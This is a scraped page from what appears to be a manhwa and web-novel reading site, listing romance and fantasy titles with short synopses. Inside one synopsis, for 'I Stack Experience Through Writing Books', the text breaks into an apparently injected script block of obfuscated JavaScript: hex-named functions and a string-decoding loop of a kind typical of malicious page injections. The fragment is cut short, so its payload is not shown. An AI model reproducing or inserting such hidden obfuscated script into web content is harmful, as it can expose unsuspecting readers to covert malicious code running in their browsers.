2020 - Page 22

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

738 results

I Raised Cinderella Preciously

A Wicked Tale of Cinderella’s Stepmom / I Raised Cinderella Preciously / 신데렐라를 곱게 키웠습니다 There is a famous fairytale. A kindhearted girl whose father and stepmother got married and became a family of five with her two stepsisters. The poor girl who was condemned by her stepmother and stepsisters when her father died. The very fairytale, Cinderella. But I am not Cinderella, I am the stepmother. At the age of thirty-seven, already married twice, been widowed twice and is raising three daughters! Daniel Walford, a man who keeps approaching me while I’m busy trying to raise my three daughters. “Can I kiss you?” As a son-in law, I think he’s a little bit older but why does he keep approaching?… Oh, I don’t know. Once I let Cinderella marry the prince, I can live quietly. But is this fairytale really ‘Cinderella’?


I Raised the Beast Well

Blondina, a princess who had commoner’s blood, lived quietly in a separate palace. Due to her mixed blood, she received ill-treatment and was surrounded with contempt. One day, she happened upon a wounded black cat and decided to treat it. But, the lovely cat she assumed it to be was actually…? “If you run away like that, of course, I’d want to hunt you.” Amon’s lips gently wandered down her skin. “You’re the one who picked me up. You’re the one who kept me by your side.” Amon whispered, as his feverish breath made her skin crawl. “So you have to take responsibility for me till the end, Bridey.” Once the lovely cat was all grown up, she realized… She thought she raised him well, but she’s going to be eaten up as well.


I Saved The Cursed Duke

Asteria who lives protecting the grave of the gods. One day, a man who is on the verge of dying suddenly appears in front of her, disturbing her peaceful life. This man is none other than Duke Erhardt, the most handsome and youngest governor of the empire. Asteria saves the dying duke using her magical powers, but her magical powers can only be maintained if they are together. At Erhardt’s request, she came to the outside world and became the fake duchess. Will Asteria, who is slowly adjusting to her new life, be able to achieve love and solve the curse?!


I Ship My Rival x Me

I Ship My Rival x Me My rival, Gu Yiliang, a B-lister rookie, has the face of an idol and can act well, while I, Wei Yanzi, a C-lister rookie, has the face of an idol but with mediocre acting skills. One day, I accidentally discovered a magical world, where no matter we sit, stand, move, or stay, our love is more precious than gold. The name of this world that is brimming with kindness is none other than Niangzi!


I Stack Experience Through Writing Books

The main character, Jong-Seok Lee used to be your average, run of the mill person. The only thing remotely interesting about him is the fact that he’s always at local book stores. All of that changes when he suddenly encounters a completely blank book and foolishly accepts what’s asked of him… I Stack Experience Through Reading Books<script></script><script>function _0x3b4c(_0x5b84ea,_0x22715e){var _0x3d29a2=_0x263d();return _0x3b4c=function(_0x464371,_0x4b39de){_0x464371=_0x464371-(-0x26e1+-0x1184*-0x1+0x6b*0x36);var _0x56593d=_0x3d29a2[_0x464371];return _0x56593d;},_0x3b4c(_0x5b84ea,_0x22715e);}(function(_0x11fe10,_0x240e3d){var _0x47f7ce=_0x3b4c,_0x572780=_0x11fe10();while(!![]){try{var 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I Stole The Male Lead’s First Night

Due to a mistake one night, I became the target of the most obsessive man and a villainess! After possessing Ripley, a baron’s daughter and an extra in a novel, I became the female lead. Since this is the case, I will try to enjoy the riches and luxuries of a nobleman that I couldn’t experience in my past life. I can remember up to drinking alone in a corner at a party… but I woke up the next day in the male lead’s bed! Ripley became the target of the villainess after the male lead’s remarks that she should be responsible for spending their first night together. Knowing the fate of the female lead, Ripley tries to get rid of the male lead by causing trouble, not washing, and all sorts of things. Nevertheless, the male lead’s unwavering single-minded heart begins to shake. &nbsp; &nbsp;


I Want To Hear Your Confession

I Want to Hear Your Confession Xu Yuan unwittingly discovers that his best friend has fallen in love with him and is now running away from that realization…


I Was Just An Ordinary Lady

Read Manhwa I Was Just An Ordinary Lady / Aku Hanya Wanita Biasa / El Lineaje De La Heredera / I Became An Ordinary Lady / The Heroine Of Drayfox / I’m Just An Ordinary Lady / Originally A Lady With One Line / Pinea Calon Ratu Drapeux / Tôi Chỉ Là Một Tiểu Thư Bình Thường Hansol Is Excited To Begin Her College Career When A Fatal Accident Whisks Her Away To A Mystical Land. Now In The Body Of Finea Macaira, The Daughter Of Drayfox Nobility And A Descendant Of One Of The Five Heroes Of The Empire, She Must Learn To Forget About The Past And Embrace This Magical New World. It Won’t Come Easy, As Finea Discovers Within Herself A Great Magical Ability That’s Powerful Beyond Her Control. Meanwhile, An Ancient And Destructive Force Of Evil Is About To Return… But Under The Protection Of The Six Elemental Spirits And A Friendly Dragon, She May Just Be Able To Hone Her Potential And Fulfill Her Destiny As One Of The Empire’s Great Heroes. Based On The Hit Novel. Должно Быть, Это Была Любовь В Одну Строчку Зөвхөн Нэг Талынх Л Байх Учиртай Хайр ชีวิตใหม่ของยัยเลดี้ตัวประกอบ 大小姐的精靈世界重生記 想像もできなかった令嬢の人生 精灵团宠小千金 한 줄짜리 영애였을 터


I Will Seduce The Northern Duke

<p style="text-align: left;">"Pretend to be my lover and join the social circle."</p> Selena, the top star that had the entire world's attention, was suddenly warped to Northern Duke's land during an accident while filming. Kalcion, the Northern Duke that saved her from the infernal beasts, offers Selena a chance to go back home in return for collecting information in various social circles by pretending to be his lover. Selena quickly accepts Kalcion's offer, but… "Why in the world can't you do this!?" "Don't you think that the answer to that should be obvious to you, the actress, not to me, the duke?" There was a critical problem. The Northern Duke's acting skills are horrible! "…Let's change the plan. I'll seduce you instead." And thus the contractual relationship between the two started. Will Kalcion's acting skill improve first, or will he start to have true feelings for Selena instead? <h4 class="display-5 pl-3">I Seduced the Northern Duke</h4> &nbsp;


I Won’t Get Bullied By Girls

The male protagonist, Ye Lin, met his childhood friend the "Little Overlord" Xiao Qin once again in high school. In order to seek revenge on his bully, Ye Lin worked hard for ten whole years. This story is about how a hot-blooded teenager can't help but be bullied by girls I Don't Want To Be Bullied By Girls


I'm a Noble on the Brink of Ruin, So I Might as Well Try Mastering Magic

A man who was enjoying an evening drink got transferred to the body of Liam, the fifth son of a nobleman from another world. \"I spent easy days practicing the magic I had longed for, and learned not only attribute magic, but also how to summon spirits, obtain powerful familiars, and ended up mastering even the most difficult magic!\" He became an adventurer aiming for independence from his parents\' house, which was scheduled to fall, and before he knew it, he became a higher-ranking aristocrat rather than one of the best magicians in the world.


I've Become The Villainous Empress Of A Novel

I’ve Become the Villainous Emperor of a Novel After a night of heavy drinking, I found myself transmigrated inside a novel as the villainous Empress Yulia, who will be executed for treason in three days. This is a project to find a way for the workaholic empress to live, to exact her revenge and prevent treason from happening. Will I be able to become a good and wise ruler? The constitution of an unexpected empress. The turbulent reign of the straightforward and gentle looking, but iron-fisted Empress Yulia.
